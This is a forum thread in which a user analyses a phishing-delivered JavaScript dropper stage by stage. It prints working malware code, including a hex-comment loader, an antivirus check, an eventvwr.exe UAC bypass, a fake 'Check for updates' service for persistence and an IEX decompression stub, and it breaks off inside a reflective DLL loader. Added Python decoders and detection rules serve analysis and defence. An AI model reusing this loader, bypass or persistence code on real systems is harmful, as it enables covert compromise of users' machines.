CyberForum (programmers' and computer forum), Computer Security section
Virus analysis

bliver, 04.12.2017, 14:41 (post #1, thread starter). Views: 1169, replies: 16

Hello!
I received an e-mail:
Dear customer, a loan has been issued in your name at PrivatBank; you can find out more in the attached file, which gives the full name and telephone number of your personal lending expert, the amount, and the repayment terms.

An envelope with the loan agreement has been sent to your address. If you did not receive the envelope, you need to contact your personal expert.
Inside was a JavaScript file, and I got curious what this malware does.
The js file contained a large
I unpacked it and traced it through the scripts
magirus (honorary moderator, expert in computer networks, Windows expert), 04.12.2017, 14:43 (post #2)
Do you need help with disinfection?
bliver, 04.12.2017, 14:47 (post #3, thread starter)
I wanted to understand what this virus does. Is it permitted on this site to discuss what a virus does once it gets into the system?
Sandor (virus fighter), 04.12.2017, 14:53 (post #4)
Moved to the general section.
bliver, 04.12.2017, 18:31 (post #5, thread starter)
1. The script itself

Javascript
OPOWDPWDDWED321KMML2ML2M3L1KM2L3K232V32GFCGCG1H2 = new ActiveXObject("Scripting.FileSystemObject");
OPOWDPWDDWED321KMML2MI2M3L1KM2L3K232V32GFCGCG1H2 = OPOWDPWDDWED321KMML2ML2M3L1KM2L3K232V32GFCGCG1H2.OpenTextFile(WScript.ScriptFullName,1);
abcd231243124141412412414123231241412="";
abcd231243124141412412424123231241412="0x";
abcd231243124141412412444123231241412="//";
while(!OPOWDPWDDWED321KMML2MI2M3L1KM2L3K232V32GFCGCG1H2.AtEndOfStream)
    {abcd231243224141412412414123231241412=OPOWDPWDDWED321KMML2MI2M3L1KM2L3K232V32GFCGCG1H2.ReadLine();
        if(abcd231243224141412412414123231241412.substr(0,2)==abcd231243124141412412444123231241412)
        {abcd231243224141412412414123231241412=abcd231243224141412412414123231241412.substr(2);
            abcd231243234141412412414123231241412="";
            for(i=0;i<abcd231243224141412412414123231241412.length;i+=2)
            {abcd231243234141412412414123231241412+=String.fromCharCode(abcd231243124141412412424123231241412+abcd231243224141412412414123231241412.substr(i,2));}
            abcd231243124141412412414123231241412+=abcd231243234141412412414123231241412;}
    }
OPOWDPWDDWED321KMML2MI2M3L1KM2L3K232V32GFCGCG1H2.Close();OPOWDPWDDWED321KMML2MS2M3L1KM2L3K232V32GFCGCG1H2=new ActiveXObject("WScript.Shell");
lpth=OPOWDPWDDWED321KMML2MS2M3L1KM2L3K232V32GFCGCG1H2.ExpandEnvironmentStrings("%TEMP%")+"\laksasokpaslkak.js";
OPOWDPWDDWED321KMML2MI2M3L1KM2L3K232V32GFCGCG1H2=OPOWDPWDDWED321KMML2ML2M3L1KM2L3K232V32GFCGCG1H2.CreateTextFile(lpth);
OPOWDPWDDWED321KMML2MI2M3L1KM2L3K232V32GFCGCG1H2.WriteLine (abcd231243124141412412414123231241412);
OPOWDPWDDWED321KMML2MI2M3L1KM2L3K232V32GFCGCG1H2.Close();OPOWDPWDDWED321KMML2MS2M3L1KM2L3K232V32GFCGCG1H2.Run("wscript " + lpth,2,-1);
At the beginning of the script there was a large comment; a couple of lines from it:
//76617220646C6C446174613D224A453942636E4967505342416533304E4369525051584A794C6B466B5A4367784E7977674A7A4A6E654656315A7A4655656B6F
//354D556335627A4A3564546779625852515A5846555548426D62457377557A4254526D564862465A59556B5A4B4E577074624735475A577331554564344B314A
Here it was not hard to understand: the comment contained text in unicode format, and the script extracted the script text from it and launched it for execution.

Added 2 hours 25 minutes later
2. This is the script that was contained in the comment (I have not reproduced the base64 strings in full):
Javascript
var dllData = "JE9BcnIgPSBAe30NC....";
dllData = '$data="' + dllData + '"';
WScript.Interactive = false;
function avCheck() {
    var PsWMI, PsProcesses, PsProcess;
    try { PsWMI = GetObject("winMgmts:"); }
    catch (e) {
        if (e != 0)
        { WScript.Quit(); }
    }
    PsProcesses = new Enumerator(PsWMI.ExecQuery("SELECT * FROM Win32_Process"));
    while (!PsProcesses.atEnd()) {
        PsProcess = PsProcesses.item();
        if ((PsProcess.Name == 'avp.exe') || (PsProcess.Name == 'ekrn.exe'))
        { WScript.Quit(); }
        PsProcesses.moveNext();
    }
}
avCheck();
function makerndps1() {
    var text = "";
    var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    for (var i = 0; i < 5; i++) text += possible.charAt(Math.floor(Math.random() * possible.length));
    return text + '.ps1';
} var localFile = makerndps1();
var Shell = WScript.CreateObject('WScript.Shell');
var arch = Shell.environment("system").item("processor_architecture");
var runStr; if (arch.substr(arch.length - 2) == "64")
{ runStr = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -File " + localFile; }
else { runStr = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -File " + localFile; }
function base64_decode(data) {
    var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var o1, o2, o3, h1, h2, h3, h4, bits, i = 0, enc = '';
    do {
        h1 = b64.indexOf(data.charAt(i++));
        h2 = b64.indexOf(data.charAt(i++));
        h3 = b64.indexOf(data.charAt(i++));
        h4 = b64.indexOf(data.charAt(i++));
        bits = h1 << 18 | h2 << 12 | h3 << 6 | h4;
        o1 = bits >> 16 & 0xff;
        o2 = bits >> 8 & 0xff;
        o3 = bits & 0xff;
        if (h3 == 64) enc += String.fromCharCode(o1);
        else if (h4 == 64) enc += String.fromCharCode(o1, o2);
        else enc += String.fromCharCode(o1, o2, o3);
    }
    while (i < data.length); return enc;
}
function d(data) {
    var f = WScript.CreateObject("Scripting.FileSystemObject");
    f.DeleteFile(data);
}
var code = 'JE9TQXJjaGl0ZWN0dXJl.........';
var decode = base64_decode(code);
var ostream = WScript.CreateObject('ADODB.Stream');
ostream.Open();
ostream.Position = 0;
ostream.Type = 2;
ostream.Charset = "UTF-8";
ostream.WriteText(dllData);
ostream.WriteText("\n");
ostream.WriteText(decode);
ostream.saveToFile(localFile, 2);
ostream.Close();
try { Shell.Run(runStr, 0, true); }
catch (ex) { };
d(localFile);
Here everything is clear as well.
First it checks whether antivirus products (Kaspersky or NOD) are present in the system; if it finds one, it stops.
If everything is OK, it extracts the code from base64, creates a file in the root of the Windows shell, puts the file with the code there, writes in the data held in the dlldata string, and launches it for execution.

Added 53 minutes later
3. It gets more interesting from here.
Here is the code that was in the code string:
PowerShell
$data="JE9BcnIgPSBAe30N"  # data from the previous script
$OSArchitecture = (Get-WmiObject -Class Win32_OperatingSystem | Select-Object    OSArchitecture -ErrorAction Stop).OSArchitecture
if ($OSArchitecture -Eq '64-bit') {
    $ppshome = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0'
} else {
    $ppshome = 'C:\Windows\System32\WindowsPowerShell\v1.0'
}
function Invoke-EventVwrBypass {
    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
    Param (
        [Parameter(Mandatory = $True)]
        [ValidateNotNullOrEmpty()]
        [String]
        $Command,
        [Switch]
        $Force
    )
    $ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
    $SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop
    if($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1){
        exit
    } else {
        $mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command"
        $Command = $ppshome + '\powershell.exe ' + $Command
        if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){
            New-Item $mscCommandPath -Force |
                New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
        }else{
            exit
        }
        if (Test-Path $mscCommandPath) {
        }else{
            exit
        }
        $EventvwrPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'eventvwr.exe'
        if ($PSCmdlet.ShouldProcess($EventvwrPath, 'Start process')) {
            $Process = Start-Process -FilePath $EventvwrPath -PassThru
        }
        if (-not $PSBoundParameters['WhatIf']) {
            Start-Sleep -Seconds 5
        }
        $mscfilePath = "HKCU:\Software\Classes\mscfile"
        if (Test-Path $mscfilePath) {
            Remove-Item $mscfilePath -Recurse -Force
        }
        if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){
            Stop-Process -Id $Process.Id
        }
    }
}
$dstFile = [System.IO.Path]::GetRandomFileName() + '.ps1'
$file = $env:temp + '\' +$dstFile
[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($data)) | Out-File -Encoding "ASCII" $file
$command = "&{cmd /c move '"+ $file +"' '" +$ppshome+"';"
$service = 'sc create checkupdate binpath= "%COMSPEC% /C start %COMSPEC% /C ' + $ppshome + '\powershell.exe -ExecutionPolicy Bypass -File ' + $ppshome +'\' +$dstFile+'" start= delayed-auto DisplayName= "Check for updates"'
$command = $command + "cmd /c $service;"
$command = $command + "cmd /c sc start checkupdate}"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
Invoke-EventVwrBypass -Command "-enc $encodedCommand"
Here some security settings are checked and, if everything is fine, a service named "Check for updates" is created which runs the command with the next script; the data in the event log is also cleaned up.

Added 8 minutes later
This is what the dlldata string contained; I have not reproduced the strings in full so as not to clutter the post:
PowerShell
$OArr = @{}
$OArr.Add(17, '2gxUug.....')
$OArr.Add(3, '3g/uvrl6.....')
$OArr.Add(5, 'vEMeuEGO......')
$OArr.Add(6, 'SLUX725MW......')
$OArr.Add(2, '2sYv355U//.....')
$OArr.Add(10, 'PZs588Ob7.....')
$OArr.Add(11, 'D8uHAoPlq.....')
$OArr.Add(13, 'Pn/zbXy7d.....')
$OArr.Add(9, 'ZlenL9u3x08....')
$OArr.Add(12, 'cv3/3E3S/e....')
$OArr.Add(16, 'dD+H+9SfDx.....')
$OArr.Add(18, 'hzI0P+jNxD.....')
$OArr.Add(14, '5NMBONb4f6.....')
$OArr.Add(15, 'r2f69JeI/2.....')
$OArr.Add(8, 'b65CvEV7/Xl.....')
$OArr.Add(7, '986Ir7JPeb4.....')
$OArr.Add(4, '794Mkr8nN4f.....')
$OArr.Add(19, 'AzSO+eucJL.....')
$OArr.Add(1, '7b0HYBxJliU.....')
$OFS = ''
$EncodedCompressedFile = [string]($OArr.GetEnumerator() | Sort-Object Name | %{$_.Value})
$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress);
$UncompressedFileBytes = New-Object Byte[](63848)
$DeflatedStream.Read($UncompressedFileBytes, 0, 63848) | Out-Null
([Text.Encoding]::ASCII.GetString($UncompressedFileBytes)) | IEX
Here the main script is encoded with the Deflate algorithm.
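To verify the two decoding stages described in this post (the hex-comment loader in step 1 and the $OArr chunk reassembly in the dlldata stub of step 3) without executing anything, here is an added Python example; it is not part of the post. It decodes the two comment lines quoted above exactly as the loader would, and rebuilds a constructed stub produced by make_oarr_stub, because the page truncates the real base64 strings.

```python
import base64
import random
import re
import zlib

# The two comment lines quoted from the dropper above (the page shows only this excerpt).
PAGE_COMMENT_EXCERPT = """\
//76617220646C6C446174613D224A453942636E4967505342416533304E4369525051584A794C6B466B5A4367784E7977674A7A4A6E654656315A7A4655656B6F
//354D556335627A4A3564546779625852515A5846555548426D62457377557A4254526D564862465A59556B5A4B4E577074624735475A577331554564344B314A
"""


def decode_hex_comments(js_text: str) -> str:
    """Stage 1, done offline: every line starting with "//" holds two hex digits per
    character; the loader rebuilds the text with String.fromCharCode("0x" + pair) and
    writes it to %TEMP%. Here non-hex comment lines are skipped instead of executed."""
    pieces = []
    for line in js_text.splitlines():
        if not line.startswith("//"):
            continue
        payload = line[2:].strip()
        if len(payload) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", payload):
            continue
        pieces.append(bytes.fromhex(payload).decode("latin-1"))
    return "".join(pieces)


# Matches the $OArr.Add(<key>, '<base64 chunk>') lines of the stub.
OARR_ADD = re.compile(r"\$OArr\.Add\(\s*(\d+)\s*,\s*'([^']*)'\s*\)")


def reassemble_oarr(ps_text: str) -> bytes:
    """Stage 3 ($OArr): join the chunks by numeric key, base64-decode, inflate.
    The stub sorts the hashtable by key, so the scrambled Add() order is irrelevant.
    System.IO.Compression.DeflateStream is a raw Deflate stream, hence wbits=-15."""
    chunks = {int(k): v for k, v in OARR_ADD.findall(ps_text)}
    if not chunks:
        raise ValueError("no $OArr.Add(...) entries found")
    joined = "".join(chunks[k] for k in sorted(chunks))
    return zlib.decompress(base64.b64decode(joined), wbits=-15)


def make_oarr_stub(payload: bytes, nchunks: int, seed: int = 1) -> str:
    """Constructed stand-in for the real stub (whose strings the post truncates):
    raw-Deflate the payload, base64 it, split it into numbered chunks and emit the
    Add() lines in a scrambled order, just like the sample on the page."""
    comp = zlib.compressobj(level=9, wbits=-15)
    b64 = base64.b64encode(comp.compress(payload) + comp.flush()).decode()
    step = -(-len(b64) // nchunks)  # ceiling division
    parts = [b64[i:i + step] for i in range(0, len(b64), step)]
    keys = list(range(1, len(parts) + 1))
    random.Random(seed).shuffle(keys)
    lines = ["$OArr = @{}"] + [f"$OArr.Add({k}, '{parts[k - 1]}')" for k in keys]
    return "\n".join(lines)
```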
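As an added detection example (not from the post), the Python rules below run over constructed Sysmon-style JSON events and flag the three artefacts the stage-3 script leaves behind: a value written under HKCU\Software\Classes\mscfile\shell\open\command, eventvwr.exe spawning something other than mmc.exe, and a 7045 service install whose ImagePath launches PowerShell with -ExecutionPolicy Bypass. Field names follow Sysmon events 13 and 1 and System event 7045; the sample records and the rule names are constructed.

```python
import json
import re

# Constructed Sysmon-style records (JSON lines), not telemetry from the page: the
# per-user mscfile handler being written (event 13), eventvwr.exe spawning PowerShell
# and, for contrast, its normal mmc.exe child (event 1), the "checkupdate" service
# install from the stage-3 script (event 7045) and a benign service install.
SAMPLE_EVENTS = r"""
{"EventID": 13, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Classes\\mscfile\\shell\\open\\command\\(Default)", "Details": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -enc JgB7AGMAbQBkAA=="}
{"EventID": 1, "Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\eventvwr.exe", "CommandLine": "powershell.exe -enc JgB7AGMAbQBkAA=="}
{"EventID": 1, "Image": "C:\\Windows\\System32\\mmc.exe", "ParentImage": "C:\\Windows\\System32\\eventvwr.exe", "CommandLine": "mmc.exe eventvwr.msc /s"}
{"EventID": 7045, "ServiceName": "checkupdate", "ImagePath": "%COMSPEC% /C start %COMSPEC% /C C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -File C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\kq7Zx.ps1"}
{"EventID": 7045, "ServiceName": "Spooler", "ImagePath": "C:\\Windows\\System32\\spoolsv.exe"}
"""

# The handler key the script plants. Sysmon logs HKCU as HKU\<SID>\..., so match the tail.
MSCFILE_HANDLER = re.compile(r"\\Software\\Classes\\mscfile\\shell\\open\\command", re.IGNORECASE)
# A service whose binary is PowerShell started with a policy bypass or an encoded command.
PS_SERVICE = re.compile(r"powershell(\.exe)?\s.*(-ExecutionPolicy\s+Bypass|-ep\s+Bypass|-enc\w*\s)",
                        re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_eventvwr_persistence(jsonl: str) -> list:
    """Return one finding per matching record (rule names are constructed for this example)."""
    findings = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        eid = ev.get("EventID")
        if eid == 13 and MSCFILE_HANDLER.search(ev.get("TargetObject", "")):
            # Any write here is suspicious: mscfile normally has no per-user handler.
            findings.append({"rule": "mscfile-handler-hijack",
                             "evidence": ev.get("Details", ""),
                             "writer": _basename(ev.get("Image", ""))})
        elif (eid == 1 and _basename(ev.get("ParentImage", "")) == "eventvwr.exe"
              and _basename(ev.get("Image", "")) != "mmc.exe"):
            # eventvwr.exe auto-elevates and should only ever start mmc.exe.
            findings.append({"rule": "eventvwr-unexpected-child",
                             "evidence": ev.get("CommandLine", "")})
        elif eid == 7045 and PS_SERVICE.search(ev.get("ImagePath", "")):
            findings.append({"rule": "service-launches-powershell",
                             "evidence": ev.get("ServiceName", "")})
    return findings
```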
bliver, 04.12.2017, 18:47 (post #6, thread starter)
4. And now the most interesting part: the script that the service is supposed to run.
Here my knowledge turned out to be insufficient to understand what this script does; I could not work out what the strexp string contains, whether it is binary code or MSIL.
Perhaps someone has ideas about what it actually does?
PowerShell
$strexp = "TVqQAAMAAAAEAAAA//8AALgAA"
Function XorByteArr
{
    Param
    (
        [Parameter(Position = 0, Mandatory = $True)] [Byte[]] $ByteArr,
        [Parameter(Position = 1, Mandatory = $True)] [Byte] $XorKey
    )
    for($i=0; $i -lt $ByteArr.Length ; $i++)
    {
        $ByteArr[$i] = $ByteArr[$i] -bxor $XorKey
    }
    return $ByteArr
}
Function Base64DecodeByteArr
{
  Param
    (
    [Parameter(Position = 0, Mandatory = $True)] [Byte[]] $ByteArr
  )
  return [System.Convert]::FromBase64CharArray($ByteArr, 0, $ByteArr.Length)
}
#x64 and x86 in one function (choice is made up based on powershell process bitness)
Function TryElevIRDI
{
  Param
  (
    [Parameter(Position = 0, Mandatory = $True)] [string] $dllUrl_x86,
    [Parameter(Position = 1, Mandatory = $True)] [string] $dllUrl_x64,
    [Parameter(Position = 2, Mandatory = $True)] [string] $funcName,
    [Parameter(Position = 3, Mandatory = $False)] [scriptblock] $decFunc,
    [Parameter(Position = 4, Mandatory = $False)] [array] $decParams
  )
  #CONSTANTS
  $HASH_KEY = 13
  $BOOTSTRAP_MAX_LENGTH = 128
  $THREAD_WAIT_TIME = 35 * 1000
  $CHILD_PROC_TO_KILL = 'ctfmon'
  $DEBUG = $False
  #Funcs
  $Win32Funcs = New-Object System.Object
  #
  Function Get-Win32Types
    {
        $Win32Types = New-Object System.Object
 
        $Domain = [AppDomain]::CurrentDomain
        $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')
        $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)
        $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
 
        ############    ENUM    ############
        #Enum MagicType
        $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])
        $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null
        $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null
        $MagicType = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType
 
        ###########    STRUCT    ###########
        #Struct IMAGE_DATA_DIRECTORY
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)
        ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null
        ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null
        $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY
 
        #Struct IMAGE_FILE_HEADER
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)
        $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null
        $IMAGE_FILE_HEADER = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER
 
        #Struct IMAGE_OPTIONAL_HEADER64
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)
        ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
        ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
        ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
        ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
        ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
        ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
        ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
        ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
        ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null
        ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
        ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
        ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
        ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
        ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
        ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
        ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
        ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
        ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
        ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
        ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
        ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null
        ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null
        ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null
        ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null
        ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
        ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
        ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
        ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
        ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
        ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
        ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
        ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
        ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
        ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
        ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
        ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
        ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
        ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
        ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null
        ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null
        $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64
 
    #Struct IMAGE_OPTIONAL_HEADER32
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224)
        ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
        ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
        ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
        ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
        ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
        ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
        ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
        ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
        ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null
        ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null
        ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
        ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
        ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
        ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
        ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
        ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
        ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
        ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
        ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
        ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
        ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
        ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null
        ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null
        ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null
        ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null
        ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null
        ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null
